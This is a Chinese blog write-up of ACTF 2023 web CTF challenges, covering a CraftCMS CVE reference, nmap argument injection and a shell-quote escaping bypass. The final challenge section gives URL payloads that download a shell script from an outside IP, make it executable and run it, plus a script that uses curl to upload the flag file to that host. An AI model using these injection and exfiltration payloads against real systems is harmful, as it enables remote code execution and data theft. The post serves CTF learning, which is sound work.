【Web】ACTF 2023 题解

最新推荐文章于 2025-05-06 15:19:58 发布
原创 最新推荐文章于 2025-05-06 15:19:58 发布 · 503 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ACTF2023 #WEB #WP #CTF

目录

craftcms

MyGO's Live!!!!!

~AveMujica's Masquerade~

无聊,随便复现

craftcms

参考:CVE-2023-41892 CraftCMS远程代码执行漏洞分析 | Bmth's blog

 

MyGO's Live!!!!!

 nmap的命令拼接利用参考

BUUCTF-[BUUCTF 2018]Online Tool(单引号逃逸、nmap写文件) - zhengna - 博客园

空格可以用tab键来绕过

 

flag用通配符来找

 最终payload

/checker?url=123456:8080%09-iL%09/flag-????????????????

~AveMujica's Masquerade~

和上一题类似,但是无回显

另外转义用的是shellQuote

 shell-quote的绕过参考

Exploiting CVE-2021-42740

 

/checker?url=1:`:`wget$IFS$9http://27.25.151.98:1337/1.sh$IFS$9-O$IFS$9/tmp/1.sh``:`
/checker?url=1:`:`chmod$IFS$9%2bx$IFS$9/tmp/1.sh``:`
/checker?url=1:`:`/tmp/1.sh``:`

远程的1.sh文件 

#!/bin/sh
curl -T /flag-???????????????? http://27.25.151.98:1338

成功外带 

Z3r4y
关注
CTF2023Ciscn WEB方向题解
Sapphire037的博客
05-29 3132
比赛体验一般,一黑灯基本上题都烂掉。
Buuctf Web题解
weixin_68029979的博客
04-24 2111
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
ctf题目
qq_46132256的博客
09-04 531
高不够时先查看图片属性长宽转为16进制,再使用010editor等二进制查看图片长宽的十六进制并修改。
2025ACTF Web部分题解
pwfortune的博客
05-06 1135
但是admin的密码和key在secret.py里面, 而这里也不存在文件读取的漏洞, 所以无法获取key和密码。后面看其他佬的wp, 原来要用到sql注入来伪造邮件来源, 不过感觉还是没太看懂其他那些, 也没有环境复现了。前面登录随便输入可以进入文件上传页面, 随便上传一张图片, 发现路由存在。构造出admin的session(自己本地搭一下环境运行一下就可以)分析一下源码需要以admin的用户登录, 可以进行ssti注入rce。ezmail.org连不了, 本地无法调试, 不知道咋弄, 先放弃。
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 2609
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
BUUCTF Web 题解
duwgv的博客
03-02 1400
在最下面出现了一串代码,它告诉我们,将cat == dog就给我们回显类似于flag的东西。这时想到file传入参数为flag.php,flag大概被隐藏在该文件中,试一下php伪协议。可以有文件显示,说明这大概是个Linux系统,那就来找一下,flag文件。有个$a 变量,这个可以用变量覆盖,但有的不行。进去后给我们一个这样的笑脸,也是什么都没有,同样看页面的源代码。来ping一下本机,发现可以,然后看看分号还可以用不。这个可以代表空格,但不是唯一,可以去查一下。这里可以看出,是单引号闭合。
部分ctf-web题解
weixin_66669317的博客
12-06 2428
ctfweb部分题解
[ACTF2020 新生赛]BackupFile题解
2301_81574836的博客
04-26 392
[ACTF2020 新生赛]BackupFile题解
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2661
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUU 【ACTF2020 新生赛】Include 1 解题大致思路
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-14 1361
1.首先打开靶场环境 看到链接tips 打开tips 2.
[BUUCTF007] [ACTF2020 新生赛]Include
m0_52674595的博客
12-02 5721
[BUUCTF007] [ACTF2020 新生赛]Include 打开后看到这个 先点击 看到是打开了一个叫做flag.php的文件 但是并没有想要的flag 检查元素或查看源代码并没有收获 分析得 该题为: 使用文件包含漏洞读取网页代码 文件包含漏洞: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服务器被远程控制、被安装后
[ACTF2020 新生赛]Include1实验小结和思考
07-08
### 实验小结与思考:[ACTF2020 新生赛] Include1 题解与分析 #### 三、实验背景与目标 本题属于 Web 安全中的文件包含漏洞利用类型,主要考察 PHP 中 `include` 函数在未正确过滤用户输入时可能引发的安全问题。...
slf4j-simple-1.8.0-beta2.jar中文文档.zip
08-24
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
基于gin搭建的go框架.zip
08-24
基于gin搭建的go框架.zip
lombok-1.12.2.jar中文文档.zip
08-24
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
qhexedit2-doc-0.8.9-11.el8.tar.gz
08-24
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
基于go-zero的容器环境.zip
08-24
基于go-zero的容器环境.zip
基于go-gin的商城.zip
08-24
基于go-gin的商城.zip
一款基于GO语言,支持跨平台,可以统计项目代码行数的软件(命令行软件,无界面),支持多种自定义过滤。 主要用于代码安全审计服务相关的费用评估。.zip
最新发布
08-24
一款基于GO语言,支持跨平台,可以统计项目代码行数的软件(命令行软件,无界面),支持多种自定义过滤。 主要用于代码安全审计服务相关的费用评估。.zip
buuctf web [ACTF2020 新生赛]Include 1
01-15
### 关于 BUUCTF ACTF2020 新生赛 Web Include 题目分析 #### 背景介绍 该题目属于Web安全领域中的文件包含漏洞利用。通过特定的URL参数绕过服务器端的安全检查,最终读取到目标文件的内容。 #### 技术细节解析 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值